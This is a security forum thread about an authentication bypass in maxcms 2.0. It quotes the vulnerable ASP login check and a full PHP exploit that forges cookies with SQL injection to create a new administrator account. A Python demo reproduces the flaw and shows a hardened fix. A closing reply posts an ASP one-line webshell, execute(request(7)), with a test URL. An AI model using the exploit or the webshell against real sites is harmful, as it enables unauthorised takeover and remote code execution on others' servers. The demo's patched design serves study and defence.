by flyh4t
The maxcms back end has an auto-update feature; the AJAX injection was patched by it, but this vulnerability still has not been patched.
In the previous thread someone asked whether the authentication can be bypassed. The answer is yes, but the precondition is that you know the path of the admin directory.
Let's review the vulnerable code:
Sub checkPower
    dim loginValidate,rsObj : loginValidate = "maxcms2.0"
    err.clear
    on error resume next
    ' the m_username cookie is spliced straight into the SQL text, unescaped
    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
    ' expected token: md5 of request-controlled headers plus the m_random the query returned
    loginValidate = md5(getAgent&getIp&rsObj(0))
    if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    ' the cookie name itself is built from the (attacker-supplied) username cookie
    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    checkManagerLevel rsObj(1)
    set rsObj=nothing
End Sub

where rCookie is just a wrapper around the raw cookie value:

Function rCookie(cookieName)
    rCookie = request.cookies(cookieName)
End Function

The key is the value of this variable: loginValidate = md5(getAgent&getIp&rsObj(0))
By forging cookies this authentication code can be bypassed easily; after that you can add a new administrator, or modify the configuration file to insert a one-line webshell.
Here I am posting an exploit that adds a new administrator:
<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 create new admin exploit
by Flyh4t
team:wolvez security team
site:bbs.wolvez.org
dork:salemax#qq.com
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$name = rand(1, 10000);
// form fields for admin/admin_manager.asp?action=add: new account flyh4t<n> / wolvez, m_level=0
$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';
$resp = send($cmd);
// the back end answers with a javascript alert() when the account was created
if (stripos($resp, 'alert') === false) { echo "[~]bad luck,exploit failed"; exit; }
print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit success
[+]you have added a new admin user flyh4t'.$name.'/wolvez
+---------------------------------------------------------------------------+
');

function send($cmd)
{
    global $host, $path;
    $message  = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    // getAgent and getIp are fed from these two headers, so the hash inputs are under our control
    $message .= "User-Agent: flyh4t\r\n";
    $message .= "X-Forwarded-For:1.1.1.1\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    // m_username carries a UNION injection, so the checkPower query returns m_random=663179683474, m_level=0;
    // check<m_username> must then equal md5(getAgent & getIp & m_random), i.e. the hash of "flyh4t", "1.1.1.1"
    // and "663179683474" (the value below is the one computed for exactly these inputs)
    $message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    echo $message;
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) { echo "[~]connect failed: $errstr ($errno)"; exit; }
    fputs($fp, $message);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);
    echo $resp;
    return $resp;
}
?>

Last edited by flyh4t (2009-02-07 19:32:07)
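As an added illustration (this is not code from the post above nor from maxcms itself), the following Python reproduces the checkPower logic against an in-memory SQLite table, shows why the two forged cookies the exploit sends are accepted, and puts a hardened variant next to it. Assumptions: the table prefix is m_ as in the exploit's cookie, getAgent/getIp map to the User-Agent and X-Forwarded-For headers the exploit sets, VBScript's & concatenates the numeric m_random as its decimal string, and the admin row and server key are constructed for the demo.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed sample data standing in for maxcms' {pre}manager table (prefix m_ assumed).
# The admin's m_random is the per-account secret the original scheme relies on.
ADMIN_RANDOM = "5f1c2a9e7b3d"          # constructed, not a real maxcms value
SERVER_KEY = secrets.token_bytes(32)  # hardened variant only; generated fresh per run


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table m_manager (m_username text, m_random text, m_level integer)")
    conn.execute("insert into m_manager values ('admin', ?, 0)", (ADMIN_RANDOM,))
    return conn


def login_validate(agent, ip, m_random):
    """md5(getAgent & getIp & rsObj(0)) from checkPower, & taken as string concatenation."""
    return hashlib.md5((agent + ip + str(m_random)).encode()).hexdigest()


def vulnerable_lookup(conn, cookie_username):
    """The original query: the cookie value is spliced into the SQL text unescaped."""
    sql = "select m_random,m_level from m_manager where m_username='%s'" % cookie_username
    return conn.execute(sql).fetchone()


def vulnerable_check_power(conn, cookies, agent, ip):
    """checkPower as posted: agent and ip come from request headers, m_random from the lookup."""
    username = cookies.get("m_username", "")
    row = vulnerable_lookup(conn, username)
    if row is None:
        return False
    return cookies.get("check" + username) == login_validate(agent, ip, row[0])


def forge_cookies(agent, ip, chosen_random=663179683474):
    """The two cookies the exploit sends: a UNION payload that makes the lookup return an
    attacker-chosen m_random, and the matching check cookie computed client-side."""
    injected = "flyh4t' union select %d,0 from m_manager where m_username='admin" % chosen_random
    return {
        "m_username": injected,
        "check" + injected: login_validate(agent, ip, chosen_random),
    }


# Hardened variant (suggested here, not maxcms' own fix): a parameterised lookup so the cookie
# can no longer alter the query, a fixed cookie name, and a token keyed with a server-side
# secret so that knowing the hash inputs is not enough to mint one.

def hardened_lookup(conn, username):
    return conn.execute(
        "select m_random,m_level from m_manager where m_username=?", (username,)
    ).fetchone()


def issue_token(username, m_random):
    msg = ("%s|%s" % (username, m_random)).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def hardened_check_power(conn, cookies):
    username = cookies.get("m_username", "")
    row = hardened_lookup(conn, username)
    if row is None:
        return False
    return hmac.compare_digest(cookies.get("check", ""), issue_token(username, row[0]))


if __name__ == "__main__":
    db = build_db()
    agent, ip = "flyh4t", "1.1.1.1"  # the User-Agent and X-Forwarded-For values the exploit sends
    forged = forge_cookies(agent, ip)
    print("lookup with injected cookie ->", vulnerable_lookup(db, forged["m_username"]))
    print("vulnerable check accepts forged cookies:", vulnerable_check_power(db, forged, agent, ip))
    print("hardened check accepts forged cookies:", hardened_check_power(db, forged))
```

The point the run makes: with the UNION in place the query returns whatever m_random the attacker chose, and since the other two hash inputs are request headers, the "secret" token is fully computable by the client. The hardened lookup returns no row for the injected username at all, and even a correct username cannot be turned into a token without SERVER_KEY.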
Haha, nice one above.
ASP also supports // comments~~ learned something.
<%
test = "luoye":execute(request(7))//"
%>
xx.asp?7=response.write("zzzzzzzzzzzzzxxx")
I wonder what other comment syntax ASP supports besides single-quote comments and // comments?